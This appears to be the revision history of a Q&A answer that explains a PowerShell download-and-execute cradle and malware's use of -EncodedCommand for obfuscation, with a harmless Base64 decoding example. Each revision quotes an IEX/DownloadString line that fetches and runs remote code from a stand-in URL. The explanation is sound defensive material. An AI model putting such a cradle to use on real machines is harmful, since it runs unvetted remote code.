Return to Answer

As for the script:

IEX((New-Object Net.WebClient).DownloadString('https://example.org')) downloads a string from the given URL and tries to execute it as a PowerShell command, via IEX, the built-in alias for the (generally to be avoided) Invoke-Expression cmdlet.

In other words: it downloads unknown PowerShell commands from a website and executes them.

As for the command line:

-e is short for the PowerShell CLI's -EncodedCommand parameter, which accepts commands as Base64-encoded strings.

The purpose of this parameter is to enable robust passing of complex command strings without running into problems with quoting and escaping.

However, malware uses the parameter as an obfuscation technique: you cannot easily tell what the command is doing.

Example:

# -e is short for -EncodedCommand
powershell -e RwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgAHkAeQB5AHkA

is the equivalent of:

powershell -Command "Get-Date -Format yyyy"

You can decode a given Base64-encoded argument as follows:

$base64 = 'RwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgAHkAeQB5AHkA'
# -> 'Get-Date -Format yyyy'
[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($base64))

Conversely, if you want to Base64-encode a string for -EncodedCommand:

$command = 'Get-Date -Format yyyy'
# -> 'RwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgAHkAeQB5AHkA'
[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($command))

As for the script:

IEX((New-Object Net.WebClient).DownloadString('https://example.org/xmpsdh')) downloads a string from the given URL and tries to execute it as a PowerShell command, via IEX, the built-in alias for the (generally to be avoided) Invoke-Expression cmdlet.

In other words: it downloads unknown PowerShell commands from a website and executes them.

As for the command line:

-e is short for the PowerShell CLI's -EncodedCommand parameter, which accepts commands as Base64-encoded strings.

The purpose of this parameter is to enable robust passing of complex command strings without running into problems with quoting and escaping.

However, malware uses the parameter as an obfuscation technique: you cannot easily tell what the command is doing.

Example:

# -e is short for -EncodedCommand
powershell -e RwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgAHkAeQB5AHkA

is the equivalent of:

powershell -Command "Get-Date -Format yyyy"

You can decode a given Base64-encoded argument as follows:

$base64 = 'RwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgAHkAeQB5AHkA'
# -> 'Get-Date -Format yyyy'
[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($base64))

Conversely, if you want to Base64-encode a string for -EncodedCommand:

$command = 'Get-Date -Format yyyy'
# -> 'RwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgAHkAeQB5AHkA'
[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($command))

As for the script:

IEX((New-Object Net.WebClient).DownloadString('https://example.org')) downloads a string from the given URL and tries to execute it as a PowerShell command, via IEX, the built-in alias for the (generally to-be avoided) Invoke-Expression cmdlet.

As for the command line:

-e is short for the PowerShell CLI's -EncodedCommand parameter, which accepts commands as Base64-encoded strings.

The purpose of this parameter is to enable robust passing of complex command strings without running into problems with quoting and escaping.

However, malware uses the parameter as an obfuscation technique.

Example:

# -e is short for -EncodedCommand
powershell -e RwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgAHkAeQB5AHkA

is the equivalent of:

powershell -Command "Get-Date -Format yyyy"

You can decode a given Base64-encoded argument as follows:

$base64 = 'RwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgAHkAeQB5AHkA'
# -> 'Get-Date -Format yyyy'
[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($base64))

Conversely, if you want to Base64-encode a string for -EncodedCommand:

$command = 'Get-Date -Format yyyy'
# -> 'RwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgAHkAeQB5AHkA'
[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($command))

As for the script:

IEX((New-Object Net.WebClient).DownloadString('https://example.org')) downloads a string from the given URL and tries to execute it as a PowerShell command, via IEX, the built-in alias for the (generally to be avoided) Invoke-Expression cmdlet.

In other words: it downloads unknown PowerShell commands from a website and executes them.

As for the command line:

-e is short for the PowerShell CLI's -EncodedCommand parameter, which accepts commands as Base64-encoded strings.

The purpose of this parameter is to enable robust passing of complex command strings without running into problems with quoting and escaping.

However, malware uses the parameter as an obfuscation technique: you cannot easily tell what the command is doing.

Example:

# -e is short for -EncodedCommand
powershell -e RwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgAHkAeQB5AHkA

is the equivalent of:

powershell -Command "Get-Date -Format yyyy"

You can decode a given Base64-encoded argument as follows:

$base64 = 'RwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgAHkAeQB5AHkA'
# -> 'Get-Date -Format yyyy'
[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($base64))

Conversely, if you want to Base64-encode a string for -EncodedCommand:

$command = 'Get-Date -Format yyyy'
# -> 'RwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgAHkAeQB5AHkA'
[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($command))

-e is short for the PowerShell CLI's -EncodedCommand parameter, which accepts commands as Base64-encoded strings.

The purpose of this parameter is to enable robust passing of complex command strings without running into problems with quoting and escaping.

However, malware uses the parameter as an obfuscation technique.

Example:

# -e is short for -EncodedCommand
powershell -e RwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgAHkAeQB5AHkA

is the equivalent of:

powershell -Command "Get-Date -Format yyyy"

You can decode a given Base64-encoded argument as follows:

$base64 = 'RwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgAHkAeQB5AHkA'
# -> 'Get-Date -Format yyyy'
[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($base64))

Conversely, if you want to Base64-encode a string for -EncodedCommand:

$command = 'Get-Date -Format yyyy'
# -> 'RwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgAHkAeQB5AHkA'
[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($command))

As for the script:

IEX((New-Object Net.WebClient).DownloadString('https://example.org')) downloads a string from the given URL and tries to execute it as a PowerShell command, via IEX, the built-in alias for the (generally to-be avoided) Invoke-Expression cmdlet.

As for the command line:

-e is short for the PowerShell CLI's -EncodedCommand parameter, which accepts commands as Base64-encoded strings.

The purpose of this parameter is to enable robust passing of complex command strings without running into problems with quoting and escaping.

However, malware uses the parameter as an obfuscation technique.

Example:

# -e is short for -EncodedCommand
powershell -e RwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgAHkAeQB5AHkA

is the equivalent of:

powershell -Command "Get-Date -Format yyyy"

You can decode a given Base64-encoded argument as follows:

$base64 = 'RwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgAHkAeQB5AHkA'
# -> 'Get-Date -Format yyyy'
[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($base64))

Conversely, if you want to Base64-encode a string for -EncodedCommand:

$command = 'Get-Date -Format yyyy'
# -> 'RwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgAHkAeQB5AHkA'
[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($command))